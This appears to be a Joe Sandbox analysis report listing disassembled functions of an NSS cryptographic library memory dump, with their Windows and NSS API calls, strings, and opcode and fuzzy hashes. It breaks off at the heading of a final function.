Function 6C798E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C798E01,00000000,6C799060,6C8A0B64), ref: 6C798E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C798E01,00000000,6C799060,6C8A0B64), ref: 6C798E9E
PORT_ArenaAlloc_Util.NSS3(6C8A0B64,00000001,?,?,?,?,6C798E01,00000000,6C799060,6C8A0B64), ref: 6C798EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C798E01,00000000,6C799060,6C8A0B64), ref: 6C798EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C798E01,00000000,6C799060,6C8A0B64), ref: 6C798ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C798E01,00000000,6C799060,6C8A0B64), ref: 6C798EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C798E01), ref: 6C798EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C8A0B64,6C8A0B64), ref: 6C798F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C798F3F

Part of subcall function 6C79A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C79A421,00000000,00000000,6C799826), ref: 6C79A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C79904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C798E76

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: c7c2089f0649369733169bd45da4c2560808e04aaad055f38b88d85b6c4fdcc2
Instruction ID: 21fb197794330fe1dc3010e005d70744ee537f84a84802b7318777fba417aa60
Opcode Fuzzy Hash: c7c2089f0649369733169bd45da4c2560808e04aaad055f38b88d85b6c4fdcc2
Instruction Fuzzy Hash: 7861B3B5D00106AFEB10CF5ADE40AABB7BAFF94358F144538DC29A7700E735A915CBA1

Function 6C788F40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C789582), ref: 6C788F5B

Part of subcall function 6C79BE30: SECOID_FindOID_Util.NSS3(6C75311B,00000000,?,6C75311B,?), ref: 6C79BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C788F6A

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C788FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C788FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C86D820,6C789576), ref: 6C788FF9
DER_GetInteger_Util.NSS3(?), ref: 6C78901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C78903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C789062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7890A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C7890CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7890F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C78912D
free.MOZGLUE(00000000), ref: 6C789136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C789145

Strings

/G6/, xrefs: 6C788F4F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID: /G6/
API String ID: 3626836424-570549270
Opcode ID: d3e31eab947f8b8d56a190470adb32f3fd361b38ae3f5e559d5032ca4c180cef
Instruction ID: bb497541b7b36388bf92e821f52cfc5cfaf7cc5b6a980f14e4e4b6d9418c43ec
Opcode Fuzzy Hash: d3e31eab947f8b8d56a190470adb32f3fd361b38ae3f5e559d5032ca4c180cef
Instruction Fuzzy Hash: 515134B2A092009BE710CF28DE85B9BB7E8EF94358F044939E955C7701E731E949CBD2

Function 6C7B0C60 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,{l), ref: 6C7B0C81

Part of subcall function 6C79BE30: SECOID_FindOID_Util.NSS3(6C75311B,00000000,?,6C75311B,?), ref: 6C79BE44

Part of subcall function 6C788500: SECOID_GetAlgorithmTag_Util.NSS3(6C7895DC,00000000,00000000,00000000,?,6C7895DC,00000000,00000000,?,6C767F4A,00000000,?,00000000,00000000), ref: 6C788517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7B0CC4

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7B0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7B0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C7B0D7D
free.MOZGLUE(00000000), ref: 6C7B0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7B0DC1
free.MOZGLUE(00000000), ref: 6C7B0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7B0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7B0E0F

Part of subcall function 6C7895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C767F4A,00000000,?,00000000,00000000), ref: 6C7895E0
Part of subcall function 6C7895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C767F4A,00000000,?,00000000,00000000), ref: 6C7895F5
Part of subcall function 6C7895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C789609
Part of subcall function 6C7895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C78961D
Part of subcall function 6C7895C0: PK11_GetInternalSlot.NSS3 ref: 6C78970B
Part of subcall function 6C7895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C789756
Part of subcall function 6C7895C0: PK11_GetIVLength.NSS3(?), ref: 6C789767
Part of subcall function 6C7895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C78977E
Part of subcall function 6C7895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78978E

Strings

*,{l, xrefs: 6C7B0DCC
/G6/, xrefs: 6C7B0C6F
-${l, xrefs: 6C7B0C64
*,{l, xrefs: 6C7B0C69, 6C7B0DE0, 6C7B0C80, 6C7B0C8B, 6C7B0CAF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,{l$*,{l$-${l$/G6/
API String ID: 3136566230-1356643040
Opcode ID: 2ed5b8b21056b727b559a80fb13f61af47667712116811a3ce561e4f4ce5b397
Instruction ID: b9714cf1766e9e67cce08855c9ac5468424fdcb5a373b78b09707d299d2f2cfe
Opcode Fuzzy Hash: 2ed5b8b21056b727b559a80fb13f61af47667712116811a3ce561e4f4ce5b397
Instruction Fuzzy Hash: DC41A0F1901245ABEB109F65DE4ABAF7674FF0530CF100538E91567B81E735AA18CBE2

Function 6C854960 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C858061,?,?,?,?), ref: 6C85497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C85499E
GetLastError.KERNEL32(?,?,6C858061,?,?,?,?), ref: 6C8549AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C858061,?,?,?,?), ref: 6C8549C2

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C858061,?,?,?,?), ref: 6C8549D6
CreateSemaphoreA.KERNEL32(00000000,6C858061,7FFFFFFF,?), ref: 6C854A19
GetLastError.KERNEL32(?,?,?,?,6C858061,?,?,?,?), ref: 6C854A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C858061,?,?,?,?), ref: 6C854A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C858061,?,?,?,?), ref: 6C854A52
GetLastError.KERNEL32(?,?,?,?,6C858061,?,?,?,?), ref: 6C854A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C858061,?,?,?,?), ref: 6C854A6A
CreateSemaphoreA.KERNEL32(?,6C858061,7FFFFFFF,?), ref: 6C854A9A
free.MOZGLUE(?,?,?,?,?,6C858061,?,?,?,?), ref: 6C854AAE
free.MOZGLUE(?,?,?,?,?,6C858061,?,?,?,?), ref: 6C854AC2

Strings

/G6/, xrefs: 6C854969

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID: /G6/
API String ID: 2092618053-570549270
Opcode ID: 619c018d7c74a51148e16956cc2a9ea6f359b78a85c32810e4e643430156e6db
Instruction ID: dec4a255bd7a373e1e1e036df2b3833d591312276153c55db27138c3b2bd8ca8
Opcode Fuzzy Hash: 619c018d7c74a51148e16956cc2a9ea6f359b78a85c32810e4e643430156e6db
Instruction Fuzzy Hash: 3C412B74B00205ABDF60EFA8CD49B4A7BF8ABCA31DF940434E819A7741D7719424C7A5

Function 6C80CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C80CC7B), ref: 6C80CD7A

Part of subcall function 6C80CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C77C1A8,?), ref: 6C80CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C80CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C80CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C80CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C80CD8E

Part of subcall function 6C7305C0: PR_EnterMonitor.NSS3 ref: 6C7305D1
Part of subcall function 6C7305C0: PR_ExitMonitor.NSS3 ref: 6C7305EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C80CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C80CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C80CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C80CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C80CE48

Strings

getaddrinfo, xrefs: 6C80CD88, 6C80CDF9
wship6.dll, xrefs: 6C80CDE3
getnameinfo, xrefs: 6C80CDB2, 6C80CE23
ws2_32.dll, xrefs: 6C80CD75
freeaddrinfo, xrefs: 6C80CD9F, 6C80CE10

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 347008cc30c1a3e78a3f0528892eb4e3b4a69e9fe1a443a00df121236fecf17a
Instruction ID: 6b835a847d5fbc51e017496e7090bb071e856e86d1b1ea4912309fa098074a7d
Opcode Fuzzy Hash: 347008cc30c1a3e78a3f0528892eb4e3b4a69e9fe1a443a00df121236fecf17a
Instruction Fuzzy Hash: 7F1184A6F1213156DB31AEB57E08AAE39595B0218DF181D35E809D2F53FB21C908C6F3

Function 6C762C40 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?vl,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23,?), ref: 6C762C62
EnterCriticalSection.KERNEL32(0000001C,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23,?), ref: 6C762C76
PL_HashTableLookup.NSS3(00000000,?,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23,?), ref: 6C762C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23,?), ref: 6C762C93

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23,?), ref: 6C762CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23,?), ref: 6C762CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C75E477,?,?,?,00000001,00000000,?,?,6C763F23), ref: 6C762CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C75E477,?,?,?,00000001,00000000,?), ref: 6C762CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C75E477,?,?,?,00000001,00000000,?), ref: 6C762D4D
EnterCriticalSection.KERNEL32(?), ref: 6C762D61
PL_HashTableLookup.NSS3(?,?), ref: 6C762D71
PR_Unlock.NSS3(?), ref: 6C762D7E

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

/G6/, xrefs: 6C762C4C
#?vl, xrefs: 6C762C43

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?vl$/G6/
API String ID: 2446853827-750362646
Opcode ID: d0f339d5360de33fc346963602e4ee1f0a0ebcf8172013c92c4ca616621f827e
Instruction ID: 900eb11f0aeb8569ff34c56e856e642b94b3806fedd307785028a353acd1d43d
Opcode Fuzzy Hash: d0f339d5360de33fc346963602e4ee1f0a0ebcf8172013c92c4ca616621f827e
Instruction Fuzzy Hash: CF51C3B6D00505ABDB109F29DD4D8AA7768BF1935CB048534EC1897F12EB31ED64C7E1

Function 6C7BAD90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BADB1

Part of subcall function 6C79BE30: SECOID_FindOID_Util.NSS3(6C75311B,00000000,?,6C75311B,?), ref: 6C79BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7BADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7BAE08

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BAE25
PL_FreeArenaPool.NSS3 ref: 6C7BAE63
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C7BAE4D

Part of subcall function 6C6C4C70: TlsGetValue.KERNEL32(?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4C97
Part of subcall function 6C6C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CB0
Part of subcall function 6C6C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BAE93
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C7BAECC
PL_FreeArenaPool.NSS3 ref: 6C7BAEDE
PL_FinishArenaPool.NSS3 ref: 6C7BAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BAEF5
PL_FinishArenaPool.NSS3 ref: 6C7BAF16

Strings

security, xrefs: 6C7BADEE
/G6/, xrefs: 6C7BADA2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: /G6/$security
API String ID: 3441714441-2919133760
Opcode ID: c3f3d9e657f63d13abdf868cc85f920b2f9abd60b3cfec996414969a93d7ef1f
Instruction ID: 2a716b96b6810da89835200245ae9cf6dcd36c427ce8b0d18c56f78e929e0d8b
Opcode Fuzzy Hash: c3f3d9e657f63d13abdf868cc85f920b2f9abd60b3cfec996414969a93d7ef1f
Instruction Fuzzy Hash: C7411CB29043006BE7316E589E4EBAE32ACAF5272CF540635F814A6F41F735DA19C6D3

Function 6C776AF0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptFinal), ref: 6C776B16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C776B44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C776B53

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C776B69
PR_LogPrint.NSS3( pLastPart = 0x%p,?), ref: 6C776B85
PR_LogPrint.NSS3( pulLastPartLen = 0x%p,?), ref: 6C776BA0
PR_LogPrint.NSS3( *pulLastPartLen = 0x%x,?), ref: 6C776C0A

Strings

*pulLastPartLen = 0x%x, xrefs: 6C776C05
(CK_INVALID_HANDLE), xrefs: 6C776B4C
pulLastPartLen = 0x%p, xrefs: 6C776B9B
/G6/, xrefs: 6C776AFC
C_DecryptFinal, xrefs: 6C776B11
hSession = 0x%x, xrefs: 6C776B2E, 6C776B3E
pLastPart = 0x%p, xrefs: 6C776B80

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastPartLen = 0x%x$ hSession = 0x%x$ pLastPart = 0x%p$ pulLastPartLen = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_DecryptFinal
API String ID: 1003633598-1008722725
Opcode ID: db91e87ff9a17bb6b92df5c8031e4e2a0d8b9f2f01119b84b3e3da4cefbaa31e
Instruction ID: 8c5f9c1859d22a739147794b87f9c5c8044e7ad48ff5e9bbd7bc4a874c01935e
Opcode Fuzzy Hash: db91e87ff9a17bb6b92df5c8031e4e2a0d8b9f2f01119b84b3e3da4cefbaa31e
Instruction Fuzzy Hash: 8E31C7716011489FDF309BA9EF4CF5E37B5EB4230DF444875E80997A12DB34A958C7A1

Function 6C812D40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C812D9F

Part of subcall function 6C6CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C72F9C9,?,6C72F4DA,6C72F9C9,?,?,6C6F369A), ref: 6C6CCA7A
Part of subcall function 6C6CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6CCB26

sqlite3_exec.NSS3(?,?,6C812F70,?,?), ref: 6C812DF9
sqlite3_free.NSS3(00000000), ref: 6C812E2C
sqlite3_free.NSS3(?), ref: 6C812E3A
sqlite3_free.NSS3(?), ref: 6C812E52
sqlite3_mprintf.NSS3(6C87AAF9,?), ref: 6C812E62
sqlite3_free.NSS3(?), ref: 6C812E70
sqlite3_free.NSS3(?), ref: 6C812E89
sqlite3_free.NSS3(?), ref: 6C812EBB
sqlite3_free.NSS3(?), ref: 6C812ECB
sqlite3_free.NSS3(00000000), ref: 6C812F3E
sqlite3_free.NSS3(?), ref: 6C812F4C

Strings

/G6/, xrefs: 6C812D52

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID: /G6/
API String ID: 1957633107-570549270
Opcode ID: 66a26f52de4a76458b4501c0109182b7f70aa879127610bfd0a09117f785c04f
Instruction ID: 7e7fc25e6fc8db95a5887c57252347cb7c09c23e2a241e2cc684ba46c56b39ca
Opcode Fuzzy Hash: 66a26f52de4a76458b4501c0109182b7f70aa879127610bfd0a09117f785c04f
Instruction Fuzzy Hash: 036190B5E0420A8BEB20CF68D984B9EB7F1EF5A34CF140424DC15A7B01E739E855CBA5

Function 6C85AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

